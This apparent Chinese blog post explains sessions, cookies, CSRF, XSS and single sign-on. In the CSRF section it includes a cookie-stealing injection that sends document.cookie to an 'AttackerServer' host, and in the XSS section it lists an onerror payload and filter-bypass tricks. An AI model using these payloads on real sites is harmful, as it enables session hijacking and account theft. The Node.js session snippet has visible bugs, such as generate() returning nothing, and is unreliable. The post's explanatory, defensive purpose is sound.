session与登录机制
github 地址:戳这里
session
概念
- 指一类用来在客户端与服务器之间保持状态的解决方案
- 这种解决方案的存储结构
特点
由于
Session是以文本文件形式存储在服务器端的,所以不怕客户端修改 Session 内容。(也可以用其他存储方式比如redis)Session对象是有生命周期的Session实例是轻量级的,所谓轻量级:是指他的创建和删除不需要消耗太多资源Session对象内部有一个缓存
用法
Session 对象存储特定用户会话所需的属性及配置信息,在web页跳转时,信息将不会丢失
通常用于以下操作
- 存储整个会话过程中保持用户状态的信息,比如登录信息或者用户浏览时产生的其它信息
- 存储只需要在 页重新加载 过程中,或者 一组功能页 之间保持状态的对象
- 在 Web服务器上保持用户的 状态信息 供在任何时间从任何设备上的页面进行访问。
限制
- 用户登录越多,
session需要的内存量越大 - 每个
Session对象的持续时间是用户访问的时间加上不活动的时间。
为何需要session
HTTP协议本身是无状态的
举个喝咖啡的例子:
1、该店的店员很厉害,能记住每位顾客的消费数量,只要顾客一走进咖啡店,店员就知道该怎么对待了。这种做法就是协议本身支持状态。
2、发给顾客一张卡片,上面记录着消费的数量,一般还有个有效期限。每次消费时,如果顾客出示这张卡片,则此次消费就会与以前或以后的消费相联系起来。这种做法就是在客户端保持状态。
3、发给顾客一张会员卡,除了卡号之外什么信息也不纪录,每次消费时,如果顾客出示该卡片,则店员在店里的纪录本上找到这个卡号对应的纪录添加一些消费信息。这种做法就是在服务器端保持状态。
具体机制
- 当程序需要为某个客户端的请求创建一个
session的时候,服务器首先检查这个客户端的请求里是否已包含了一个 session标识 - 称为session id,如果已包含一个session id则说明以前已经为此客户端创建过session,服务器就按照session id把这个session检索出来使用(如果检索不到,可能会新建一个),如果客户端请求不包含session id,则为此客户端创建一个session并且生成一个与此session相关联的session id,session id的值应该是一个 既不会重复,又不容易被找到规律以仿造的字符串 ,这个session id将被在本次响应中返回给客户端保存。 由于
cookie可以被人为的禁止,必须有其他机制以便在cookie被禁止时仍然能够把session id传递回服务器。经常被使用的一种技术叫做URL重写两种形式:
// 作为url附加路径 'http://..../xxx;jsessionid=abcdefjijeoijoifjioe'// 作为查询字符串 'http://..../xxx?jsessionid=abcdefjijeoijoifjioe'较老的技术,表单隐藏字段,此方法在防止csrf中有用
实现
基于cookie来实现用户和数据的映射
将口令放在cookie中,口令一旦被褚昂爱,就丢失映射关系。通常session的有效期通常短,过期就将数据删除
一旦服务器检查到用户请求cookie中没有携带session_id,它会为之生成一个值,这个值是唯一且不重复的值,并设定超时时间。如果过期就重新生成,如果没有过期,就更新超时时间
var sessions = {};
var key = 'session_id';
var EXPIRES = 20*60*1000;
var generate = function () {var session = {};session.id = (new Date().getTime()) + Math.random();session.cookie = {expire: (new Date()).getTime() + EXPIRES}sessions[session.id] = session
}function (req, res) {var id = req.cookies[key];if (!id) {req.session = generate();} else {var session = sessions[id];if (session) {if (session.cookie.expire > new Date().getTime()) {session.cookie.expire = new Date().getTime() + EXPIRES;req.session = session;} else {delete sessions[id];req.session = generate();}} else {req.session = generate();}}
}一种节省空间的做法
由于关闭浏览器不会导致session被删除,迫使服务器为seesion设置了一个失效时间,当距离客户端上一次使用session的时间超过这个失效时间时,服务器就可以认为客户端已经停止了活动,才会把session删除以节省存储空间
reference
http://justsee.iteye.com/blog/1570652
https://baike.baidu.com/item/session/479100?fr=aladdin
https://blog.csdn.net/hjc1984117/article/details/53995816
cookie
存储在用户本地终端的数据
http请求自动发送,跨域除外
用途
客户端记录用户信息
特点
存储在硬盘上的cookie可以在不同的浏览器进程间共享,比如两个IE窗口。而对于保存在内存里的cookie,不同的浏览器有不同的处理方式。
属性
name:cookie名称value:cookie值domain:可以访问cookie的域名,某一级域名可以访问上一级级域名的cookieexpires/Max-Age:过期时间Size:cookie的大小http:httponly属性,为true,不能用document.cookie获得secure:为true只能在https获得path:子路径访问父路径cookie
创建cookie
document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 GMT; path=/";
读取cookie
document.cookie
修改cookie
document.cookie =
采用覆盖的形式
删除cookie
将过期时间设置为过去时间即可
与localStorage和sessionStorage的区别
存储大小
cookie数据大小不能超过4k。sessionStorage和localStorage虽然也有存储大小的限制,但比cookie大得多,可以达到5M或更大。
有效时间
localStorage存储持久数据,浏览器关闭后数据不丢失除非主动删除数据;sessionStorage数据在当前浏览器窗口关闭后自动删除。cookie设置的cookie过期时间之前一直有效,即使窗口或浏览器关闭
sessionStorage- 会话级别的存储
- 临时性的,页面打开有,页面关闭没有
- 数据不共享
- 通过a标签来跳出一个页面,则
sessionStorage共享
localStorage- 持久化的本地存储
- 永久性的存储
- 不能跨域
- 数据共享
cookiecookie在同源且符合path规则的文档之间共享max-age用秒来设置cookie的生存期。- 如果
max-age为0,则表示删除该cookie。 - 如果
max-age为负数,则表示该cookie仅在本浏览器窗口以及本窗口打开的子窗口内有效,关闭窗口后该cookie即失效。
如何得到cookie
有两个http头部是专门负责设置以及发送cookie的,它们分别是 Set-Cookie 以及 Cookie 。当服务器返回给客户端一个http响应信息时,其中如果包含Set-Cookie这个头部时,意思就是指示客户端建立一个cookie,并且在后续的http请求中自动发送这个cookie到服务器端,直到这个cookie过期。如果cookie的生存时间是整个会话期间的话,那么浏览器会将cookie保存在内存中,浏览器关闭时就会自动清除这个cookie。另外一种情况就是保存在客户端的硬盘中,浏览器关闭的话,该cookie也不会被清除,下次打开浏览器访问对应网站时,这个cookie就会自动再次发送到服务器端。
cookie服务器端写入
//java的写法
response.setHeader("SET-COOKIE", key + "="+ value + ";Path=/;domain="+ domain + ";date="+date);//php 中的写法
setcookie(name,value,expire,path,domain,secure)reference
https://my.oschina.net/ososchina/blog/339918
https://blog.csdn.net/dong123dddd/article/details/50388656
csrf(跨站请求伪造)
过程
- 用户c打开浏览器,登录网站a
- 登录成功后,记录登录信息
cookie - 在网站
a未退出的情况下,打开网站b - 网站
b在收到用户请求后返回攻击性代码,获取网站a的cookie,并发出请求a网站(注意:这儿是两步) - 网站
a误以为还是用户c发出的请求
窃取cookie
向被攻击者的服务器页面上注入一段javascript代码(借助xss跨站脚本攻击)
document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;防御
- 验证
http referer字段 - 在请求地址中添加token
系统开发者可以在HTTP请求中以参数的形式加入一个随机产生的token,并在服务器端建立一个拦截器来验证这个token,如果请求中没有token或者token内容不正确,则认为可能是CSRF攻击而拒绝该请求。
- 在
HTTP头中自定义属性并验证(不会被泄露)
reference
http://www.freebuf.com/articles/web/11840.html
xss(跨站脚本攻击)
分类
- 反射型(非持久型)
那些浏览器每次都要在参数中提交恶意数据才能触发的跨站脚本漏洞。
可以让一个域名转向到恶意URL,把那个域名发给用户
- 存储型(持久型)
指通过提交恶意数据到存储器(比如数据库、文本文件等),Web应用程序输出的时候是从存储器中读出恶意数据输出到页面的一类跨站脚本漏洞。
常见攻击方法
- 绕过
xss-filter - 利用
img - 空格,回车,
tab来绕过过滤 - 利用事件如:
<img src=“#” onerror= “alert(1)”/> - css跨站:
background-url - 利用字符编码
防御
xss-filter,过滤标签
2.httpOnly- 将变量输出到页面时,要编码
reference
http://www.cnblogs.com/wqhwe/p/5416976.html
单系统登录
http无状态协议
浏览器每次请求,服务器都单独处理
要鉴别浏览器请求,又因为http是无状态协议,所以需要服务器和浏览器共同维护一个状态
会话机制
浏览器第一次请求服务器,创建一个会话id,并由浏览器存储,以后每次请求都带上,服务器取得后可判断是否是同一个用户
单系统利用cookie
登录状态
浏览器第一次请求服务器,需要验证用户名和密码,通过与数据库里的作比较,验证通过将会话标记为“已授权”
以后每次请求都检查登录状态
单点登录(多系统登录,single sign on,sso)
用户登录注销一次,就可以在多个系统中得到效果
由于多系统的域不一样,所有cookie会受到限制,浏览器发送http请求时会自动携带与该域匹配的cookie,而不是所有cookie
如果将domain设置为顶级域名会有限制:
- 系统群域名得统一
- 各系统使用的技术要相同
cookie不安全
登录
相比于单系统登录,sso多了一个认证中心,只有认证中心接受用户名和密码等安全信息,其他系统不提供登录入口,只接受认证中心的间接授权。间接授权通过令牌实现,sso认证中心验证用户的用户名密码没问题,创建授权令牌,在接下来的跳转过程中,授权令牌作为参数发送给各个子系统,子系统拿到令牌,即得到了授权,可以借此创建局部会话,局部会话登录方式与单系统的登录方式相同。这个过程,也就是单点登录的原理,用下图说明
用户登录成功之后,会与sso认证中心及各个子系统建立会话,用户与sso认证中心建立的会话称为全局会话,用户与各个子系统建立的会话称为局部会话,局部会话建立之后,用户访问子系统受保护资源将不再通过sso认证中心
注销
具体跳转
假设认证中心和系统2的url分别是:sso.com、system2.com ,访问 system2.com 时因未登录而跳转到 sso.com ,跳转地址:http://sso.com?service=http://system2.com(不需要额外信息),此时,就变成了浏览器与 http://sso.com 站点之间的会话,这个会话因为系统1登录的原因已经被标记为已登录,所以认证中心取一块令牌,根据service参数回跳,并附上令牌,回跳地址:http://system2.com?token=token
如何验证登录信息
不同域之间
- 当登录某一系统后,须跳转到其它系统并设置cookie
- nodejs实现302跳转
同一域名不同站点
- 共享
cookie
- 共享
同一域,不同子域
- 存放
sessionId的域都是上一级的
- 存放
reference
https://www.cnblogs.com/wxj-106/p/8097880.html
http://www.cnblogs.com/ywlaker/p/6113927.html#!comments
session与登录机制相关推荐
- HTTP Session、Cookie机制详解
一.什么是http session,有什么用 HTTP协议本身是无状态的,本身并不能支持服务端保存客户端的状态信息,于是,Web Server中引入了session的概念,用来保存客户端的状态信息. ...
- 天天生鲜的用户登录机制和redis的作用
登录机制: 采用的是user.is_authenticated的校验. 采用了django的auth系统, 登陆使用了django.contrib.auth中的login方法, 该方法会为将user_ ...
- 关于自定义的登录机制在SAP Spartacus服务器端渲染(SSR)实施过程中遇到的问题
问题背景 某客户使用了第三方的Authentication service来实现Spartacus用户的登录机制: In our project we have integration with MD ...
- Session和cookie机制详解
虽然session机制在web应用程序中被采用已经很长时间了,但是仍然有很多人不清楚session机制的本质,以至不能正确的应用这一技术.本文将详细讨论session的工作机制并且对在Java web ...
- session对象运行机制
当你看到 "会话" 这个词的时候,你会怎么理解呢?是交流.对话的意思吗?那毫无疑问绝对是的啦,只不过那是传统意义上的,或者说是日常生活中的意思,在计算机科学领域,它的意思就要引申一 ...
- spring session 退出登录 清理session
2019独角兽企业重金招聘Python工程师标准>>> spring session 退出登录 清理session 博客分类: spring /*** Allows creating ...
- CSDN登录机制分析(附上python、java代码)
大纲 前言 分析加密参数 uaToken webUmidToken 发送模拟请求 对比解决障碍 浏览器发送 postman模仿 小结 编写代码 python java 前言 很久以前研究过csdn的模 ...
- 修改session的存储机制
<?php //修改session的存储机制 //最起码应该有一个 读方法, 和一个 写方法. //1, 我们先去建立 读方法 和 写方法. //2, 告知session系统,使用我们的方法完 ...
- Win Form登录机制的实现
一:Win Form登录机制的实现 Main窗体为应用程式主窗体,Login为登录窗体.均为SDI窗体. 两种实现方式如下: 1.应用程式入口放在Login窗体,在Lo ...
最新文章
- 6、UmbracoNewsSite:添加新闻分类
- 写入访问权限冲突_全面介绍 Linux 权限
- python语言能做什么软件-python语言能做什么?
- 丢失控制文件,有旧的备份控制文件,之后有drop表空间和create表空间的操作恢复。...
- muduo源码client/server通信流程
- git的一些常用命令讲解和开发规范总结
- java中 inheritdoc,【Java】Javadoc的使用
- 向右挪一个键位使密码好记又安全
- 防刷新ajax视频教程,【赖国荣】Ajax基础与提升第7讲:ajax实现刷新内容实例讲解...
- The path ‘E:\ZERO‘ does not belong to a directory.
- galerkin有限元法matlab实现,应用Matlab实现有限元分析.pdf
- html5字体的格式转换,font字体
- 【Virtual Box 错误】0x00000000 指令引用的 0x00000000 内存。该内存不能为written
- RecordCount=-1问题
- 苹果市值破万亿,iPhone 会涨价吗?
- python手势识别算法_Hand-gesture-recognition 这是一个用python写的手势识别的算法 - 下载 - 搜珍网...
- 移动地盘仿真平台搭建
- 什么是 Proxy ?
- uniapp textarea编辑保留空格换行
- 东方博宜OJ 1056 - 【入门】所有不超过1000的数中含有数字3的自然数